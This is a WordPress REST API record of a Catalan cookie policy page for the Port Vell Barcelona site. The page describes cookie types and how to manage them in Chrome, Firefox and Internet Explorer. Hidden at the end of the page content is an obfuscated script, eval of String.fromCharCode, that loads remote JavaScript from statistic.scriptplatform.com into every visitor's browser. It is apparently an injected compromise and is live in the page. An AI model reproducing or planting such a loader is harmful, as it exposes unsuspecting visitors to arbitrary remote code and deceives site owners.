{"id":9944,"date":"2021-04-06T09:22:56","date_gmt":"2021-04-06T07:22:56","guid":{"rendered":"https:\/\/portvellbcn.cat\/?page_id=9944"},"modified":"2021-04-06T09:22:56","modified_gmt":"2021-04-06T07:22:56","slug":"cookies","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/ca\/cookies\/","title":{"rendered":"Cookies"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css=&#8221;.vc_custom_1491133560336{margin-top: 130px !important;}&#8221;][vc_column][vc_column_text css_animation=&#8221;none&#8221; css=&#8221;.vc_custom_1617693122267{margin-bottom: 20px !important;}&#8221;]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Cookies<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}&#8221;][vc_column][vc_column_text]<\/p>\n<div id=\"main\" class=\"s-main\" role=\"main\">\n<div class=\"s-content\">\n<div class=\"m-generic\">\n<div class=\"module-main\">\n<p><strong>Tipus de \u2018cookies\u2019 utilitzades<\/strong><\/p>\n<p>Aquest web pot utilitzar tant \u2018cookies\u2019 temporals de sessi\u00f3 com \u2018cookies\u2019 permanents . Les \u2018cookies\u2019 de sessi\u00f3 emmagatzemen dades \u00fanicament mentre l&#8217;usuari accedeix al web i les \u2018cookies\u2019 permanents emmagatzemen les dades en el terminal per poder ser utilitzades en m\u00e9s d&#8217;una sessi\u00f3 .<\/p>\n<p><strong>\u2018Cookies\u2019 d&#8217;an\u00e0lisi estad\u00edstica<\/strong><\/p>\n<p>S\u00f3n aquelles que permeten fer el seguiment i an\u00e0lisi del comportament dels usuaris en els llocs web. La informaci\u00f3 recollida mitjan\u00e7ant aquest tipus de \u2018cookies\u2019 s&#8217;utilitza en el mesurament de l&#8217;activitat dels llocs web, aplicaci\u00f3 o plataforma i per a l&#8217;elaboraci\u00f3 de perfils de navegaci\u00f3 dels usuaris d&#8217;aquests llocs, per tal d&#8217;introduir millores en el servei en funci\u00f3 de les dades d&#8217;\u00fas que fan els usuaris .<\/p>\n<p><strong>\u2018Cookies\u2019 de tercers<\/strong><\/p>\n<p>En algunes p\u00e0gines web poden anar \u2018cookies\u2019 de tercers que permeten gestionar i millorar els serveis oferts. Com per exemple, serveis estad\u00edstics de Google Analytics .<\/p>\n<p><strong>Qu\u00e8 passa si bloquegeu les \u2018cookies\u2019<\/strong><\/p>\n<p>En cas de bloquejar l&#8217;\u00fas de \u2018cookies\u2019 en el seu navegador \u00e9s possible que alguns serveis o funcionalitats de la p\u00e0gina web no estiguin disponibles.<\/p>\n<p>En alguns navegadors es poden configurar regles espec\u00edfiques per administrar \u2018cookies\u2019 per a cada lloc web, la qual cosa ofereix un control m\u00e9s prec\u00eds sobre la privacitat. En aquest cas es pot desactivar \u2018cookies\u2019de tots els llocs excepte d&#8217;aquells en els quals es confi\u00ef .<\/p>\n<p><strong>Com administrar cookies al navegador?<\/strong><\/p>\n<p>L&#8217;usuari t\u00e9 l&#8217;opci\u00f3 de permetre , bloquejar o eliminar les \u2018cookies\u2019 instal\u00b7lades en el seu equip mitjan\u00e7ant la configuraci\u00f3 de les opcions del navegador en el seu terminal:<\/p>\n<p><strong>Ajustar les \u2018cookies\u2019 al navegador Google Chrome:<\/strong><\/p>\n<p>\u2022 Fer clic al men\u00fa situat a la barra d&#8217;eines.<\/p>\n<p>\u2022 Seleccionar Configuraci\u00f3<\/p>\n<p>\u2022 Fer clic a Mostar opcions avan\u00e7ades.<\/p>\n<p>\u2022 A la secci\u00f3 Privacitat fer clic al bot\u00f3 Configuraci\u00f3 de contingut.<\/p>\n<p>\u2022 A la secci\u00f3 de \u2018cookies\u2019 es poden configurar les opcions .<\/p>\n<p>M\u00e9s informaci\u00f3 sobre Google Chrome (<a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?hl=es\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/support.google.com\/chrome\/answer\/95647?hl=es<\/a>)<\/p>\n<p><strong><strong>Ajustar les &#8216;cookies&#8217; al navegador Mozilla Firefox :<\/strong><\/strong><\/p>\n<p>\u2022 A la part superior de la finestra del Firefox fer clic al men\u00fa Eines.<\/p>\n<p>\u2022 Seleccionar Opcions.<\/p>\n<p>\u2022 Seleccionar el panell Privacitat.<\/p>\n<p>\u2022 En l&#8217;opci\u00f3 Firefox pot triar una Configuraci\u00f3 personalitzada per a l&#8217;historial al configurar les opcions.<\/p>\n<p>M\u00e9s informaci\u00f3 sobre Mozilla Firefox<\/p>\n<p>(<a href=\"https:\/\/support.mozilla.org\/es\/kb\/cookies-informacion-que-los-sitios-web-guardan-en-\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/support.mozilla.org\/es\/kb\/cookies-informacion-que-los-sitios-web-guardan-en-<\/a>)<\/p>\n<p><strong>Ajustar les &#8216;cookies&#8217; al navegador al navegador Internet Explorer 9:<\/strong><\/p>\n<p>\u2022 A la part superior de la finestra d&#8217;Internet Explorer fer clic al men\u00fa Eines.<\/p>\n<p>\u2022 Seleccionar la pestanya de Seguretat i utilitzar l&#8217;opci\u00f3 Suprimeix l&#8217;historial d&#8217;exploraci\u00f3 per eliminar les cookies\u2019. Activar la casella \u2018cookies\u2019 i , a continuaci\u00f3, fer clic a Suprimeix.<\/p>\n<p>\u2022 Seleccionar la pestanya de Seguretat i accedir a Configuraci\u00f3. Moure el control lliscant totalment cap amunt per bloquejar totes les \u2018cookies\u2019 o totalment avall per permetre totes les \u2018cookies\u2019. Despr\u00e9s d&#8217;aix\u00f2, fer clic a D&#8217;acord.<\/p>\n<p><strong>M\u00e9s informaci\u00f3 sobre Internet Explorer 9<\/strong><\/p>\n<p>(http:\/\/windows.microsoft.com\/es-es\/windows7\/how-to-manage-cookies-in-internet-explorer-9)<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<footer class=\"s-footer\">\n<nav class=\"n-extra\">\n<h3 class=\"nav-title\"><\/h3>\n<\/nav>\n<\/footer>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;50&#8243;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css=&#8221;.vc_custom_1491133560336{margin-top: 130px !important;}&#8221;][vc_column][vc_column_text css_animation=&#8221;none&#8221; css=&#8221;.vc_custom_1617693122267{margin-bottom: 20px !important;}&#8221;] Cookies [\/vc_column_text][\/vc_column][\/vc_row][vc_row css=&#8221;.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}&#8221;][vc_column][vc_column_text] Tipus de \u2018cookies\u2019 utilitzades Aquest web pot utilitzar tant \u2018cookies\u2019 temporals de sessi\u00f3 com \u2018cookies\u2019 permanents . Les \u2018cookies\u2019 de sessi\u00f3 emmagatzemen dades \u00fanicament mentre l&#8217;usuari accedeix al web i les \u2018cookies\u2019 permanents emmagatzemen les dades en el terminal per poder ser utilitzades en m\u00e9s d&#8217;una sessi\u00f3 . \u2018Cookies\u2019 d&#8217;an\u00e0lisi estad\u00edstica S\u00f3n aquelles que permeten fer el seguiment i an\u00e0lisi del comportament dels usuaris en els llocs web. La informaci\u00f3 recollida mitjan\u00e7ant aquest tipus de \u2018cookies\u2019 s&#8217;utilitza en el mesurament de l&#8217;activitat dels llocs web, aplicaci\u00f3 o plataforma i per a l&#8217;elaboraci\u00f3 de perfils de navegaci\u00f3 dels usuaris d&#8217;aquests llocs, per tal d&#8217;introduir millores en el servei en funci\u00f3 de les dades d&#8217;\u00fas que fan els usuaris . \u2018Cookies\u2019 de tercers En algunes p\u00e0gines web poden anar \u2018cookies\u2019 de tercers que permeten gestionar i millorar els serveis oferts. Com per exemple, serveis estad\u00edstics de Google Analytics . Qu\u00e8 passa si bloquegeu les \u2018cookies\u2019 En cas de bloquejar l&#8217;\u00fas de \u2018cookies\u2019 en el seu navegador \u00e9s possible que alguns serveis o funcionalitats de la p\u00e0gina web no estiguin disponibles. En alguns navegadors es poden [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-9944","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/9944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/comments?post=9944"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/9944\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/media?parent=9944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}